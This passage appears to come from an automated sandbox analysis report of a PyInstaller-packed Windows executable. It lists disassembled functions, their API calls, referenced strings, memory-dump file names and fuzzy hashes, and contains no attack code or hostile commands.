Instruction Fuzzy Hash: FD51E122B0964386FB14EB529460BB923D8AF59798F894438ED2D57BDEDF3CE641C700

Function 00007FFE101D1FFC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

00007FFE1FFAFCF0.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE101DB0F0

Strings

VUUU, xrefs: 00007FFE101D20B9
too repetitive; using fallback sorting algorithm, xrefs: 00007FFE101DB0F9
%d work, %d block, ratio %5.2f, xrefs: 00007FFE101DB0D6

Memory Dump Source

Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true

Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd

Similarity

API ID: 00007
String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
API String ID: 3568877910-2988393112
Opcode ID: 573b4fc15ac0525f29dd54b65a3727a92d2a990478cec9f35e6a839bb8044665
Instruction ID: c3815f1d473d3ea27f666353b734d70346a09d29c9911c274f225d513c2c005d
Opcode Fuzzy Hash: 573b4fc15ac0525f29dd54b65a3727a92d2a990478cec9f35e6a839bb8044665
Instruction Fuzzy Hash: 9541A332B08A4287F6109B2694491A977A4FB98B74F105277EB9E537B5DF3DE442C700

Function 00007FFE101D3A90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

combined CRCs: stored = 0x%08x, computed = 0x%08x, xrefs: 00007FFE101DB849
{0x%08x, 0x%08x}, xrefs: 00007FFE101DB7F9

Memory Dump Source

Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true

Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd

Similarity

API ID:
String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
API String ID: 0-2474432645
Opcode ID: ef6240e13e0423811a17c51a7da6417c4ca94b7d665d8194e23af3f34193d1f1
Instruction ID: 5326e459dcc6787916ace588de2ef321cbb929d5cde27024a64e8df77fa2ba01
Opcode Fuzzy Hash: ef6240e13e0423811a17c51a7da6417c4ca94b7d665d8194e23af3f34193d1f1
Instruction Fuzzy Hash: D2414931B0CE42C6FB609F26948827872A4EB45B64F1496B7DB8E877B5DF2CE841C710

Function 00007FF626642910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E

Strings

Error [ANSI Fallback], xrefs: 00007FF6266429FF
[PYI-%d:ERROR] , xrefs: 00007FF626642966
Error, xrefs: 00007FF626642A0E
%s: %s, xrefs: 00007FF6266429E8

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: f28a71460cd9599f0d07796ee5e64200ca790fcaf93a4e55c426e5d07c38cad7
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: A0313522B1868292EB20A761BC516FA6394BF887D4F400132FE8DC3749EF7DD556DB02

Function 00007FF626642390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6266423C8
DialogBoxIndirectParamW.USER32 ref: 00007FF62664248E
DeleteObject.GDI32 ref: 00007FF6266424C1
DestroyIcon.USER32 ref: 00007FF6266424D3

Strings

Unhandled exception in script, xrefs: 00007FF6266423F8

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction ID: b87cae1656d9ddd69439b409bb070a0faf5aef8027568092723290d009f800f4
Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction Fuzzy Hash: 26315C32A19A8289EF24DB61FC552F96360FF88784F440135EA4D8BB4ADF3DD104DB02

Function 00007FF626642B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62664918F,?,00007FF626643C55), ref: 00007FF626642BA0
MessageBoxW.USER32 ref: 00007FF626642C2A

Strings

WARNING, xrefs: 00007FF626642BAF
Warning, xrefs: 00007FF626642C1D
[PYI-%d:%ls] , xrefs: 00007FF626642BA8

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 6c43680de41562ca9894786e3b91a250a1d41bf50f619e9c00fe59142ee3e928
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: B521D122708B4282EB20DB14F8847AA73A4FB887C4F400132EA8D9775ADF3DD215CB42

Function 00007FF626642710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF626641B99), ref: 00007FF626642760

Strings

ERROR, xrefs: 00007FF62664276F
Error [ANSI Fallback], xrefs: 00007FF6266427CF
Error, xrefs: 00007FF6266427DE
[PYI-%d:%s] , xrefs: 00007FF626642768

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 415d3ceed63b74284f471c72a154b0ce66c9e97bab927fe4a514e6e95b9d6968
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: DD21AE72A18B8292EB20DB50BC917EA6394FB883C4F400132FE8C97759DF7DD6559B42

Function 00007FF626659AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF626659B1D
GetProcAddress.KERNEL32 ref: 00007FF626659B33
FreeLibrary.KERNEL32 ref: 00007FF626659B5A

Strings

mscoree.dll, xrefs: 00007FF626659B14
CorExitProcess, xrefs: 00007FF626659B2C

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 605d36a21f3f64420109a094b3a562c99078770a1591395129ff42fa4cd5ada7
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 26F0AF21B0860782FE108B20EC8533A6320FF84761F440235CA6E861E4DF2ED048EB03

Function 00007FF6266693D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF626669400
_set_statfp.LIBCMT ref: 00007FF62666941B
_set_statfp.LIBCMT ref: 00007FF626669437
_set_statfp.LIBCMT ref: 00007FF626669473

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 839da728aebb9bb77556e17cd32a6103cff6846385891e8410bf06912e5219f9
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 88118F72E5CA1301FF5C1525FC5637620447F59374E040734EE7EC62DA8EAEA941AB07

Function 00007FF62665B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B41F
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B43E
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B466
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B477
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B488

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: 4f693b279e088b5053dbb626147a3c339ff2ec3b725095acc2c66729fd840cac
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: 50117F60A0C60345FE68A7219E631796142BF847B0F588335E93DCA6DBDE2EE441AF03

Function 00007FF62665B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF62665B2A5
FlsSetValue.KERNEL32 ref: 00007FF62665B2C4
FlsSetValue.KERNEL32 ref: 00007FF62665B2EC
FlsSetValue.KERNEL32 ref: 00007FF62665B2FD
FlsSetValue.KERNEL32 ref: 00007FF62665B30E

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: c9919ac2db97eb4bc1be2fd7a4628661d93e76f95d8e961aa834a1a8815db9f3
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: 4B110360A0820786FE69A3614C6327A1142BF45370F584734D93EDA2C3DE2FB805AF93

Function 00007FF626656010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665622C

Strings

verbose, xrefs: 00007FF626656020

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: dcc7626ceb969f4791abe236f85fde07e64d22b0293a6971aba1858fd95382af
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9891AF32A08A4641FF618E29DC5237D3291BB44B94F644136DA4AC33E7DE3EE445EB43

Function 00007FF62665FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665FF17

Part of subcall function 00007FF626657AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626657AC9

Strings

ccs, xrefs: 00007FF62665FE52
UTF-8, xrefs: 00007FF62665FE96
UTF-16LEUNICODE, xrefs: 00007FF62665FEB5

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 18a349483acf42ec169e6105a05702d57b502b0b67f55302b880493ff16e8da4
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 6C81AF32E082829DFFA45E25891227936A0FB11B48F558135DA09D769BDF3FE901BF03

Function 00007FFDF0FA2010 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF0FA205A
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF0FA2078

Strings

HANGUL SYLLABLE , xrefs: 00007FFDF0FA204A
CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDF0FA206E

Memory Dump Source

Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true

Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: e657152ac4094f32ba0708cb657417d7ffcc531fc35973db48cf3960ceff084e
Instruction ID: 07ecb0f9d185ca82fa2679671e48dd62f0fa859c6d8d547e4e0b80843592b55f
Opcode Fuzzy Hash: e657152ac4094f32ba0708cb657417d7ffcc531fc35973db48cf3960ceff084e
Instruction Fuzzy Hash: 79810832B1C68246E7A48B19A868ABA6751FFC4768F440335EA7E8B7CDDF3CD5059700

Function 00007FF62664D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF62664D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF62664D77A
RtlUnwindEx.KERNEL32 ref: 00007FF62664D7D4

Strings

csm, xrefs: 00007FF62664D761

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 0f901787a06be744a7c178693a72e106887a6fa72cc5c19755e2968ed663cd31
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8F51AF32F196029AEF24CB15E864A796791FB44B98F104131DA4E877C8DFBEE841DB02

Function 00007FF62664EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF62664EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF62664EFF3

Strings

RCC, xrefs: 00007FF62664EFC3
MOC, xrefs: 00007FF62664EFBB

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 3ea4b310dadff013d513bc01293433b36559e9295327901e133b30c67d27607d
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 6661BE72908BC585EB309B15E8503AAB7A0FBC5B88F044235EB9C43B95CFBDD190CB42

Function 00007FF62664F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF62664F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF62664F408

Strings

csm, xrefs: 00007FF62664F342
csm, xrefs: 00007FF62664F45A

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 48e96f77dab55167929b669b7d6553ea229c55d619ebfb299d2cc947fa23bb9d
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 865181329082828EEF748E21996436836A0FB95B94F149135DA5C87795CFBEE850DF43

Function 00007FFDF10C2833 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

..\s\crypto\async\async.c, xrefs: 00007FFDF11830DF, 00007FFDF118312D, 00007FFDF1183146, 00007FFDF118317C, 00007FFDF11831C6, 00007FFDF118321C, 00007FFDF118323D, 00007FFDF118325B, 00007FFDF1183295, 00007FFDF11832BA
T, xrefs: 00007FFDF1183253

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
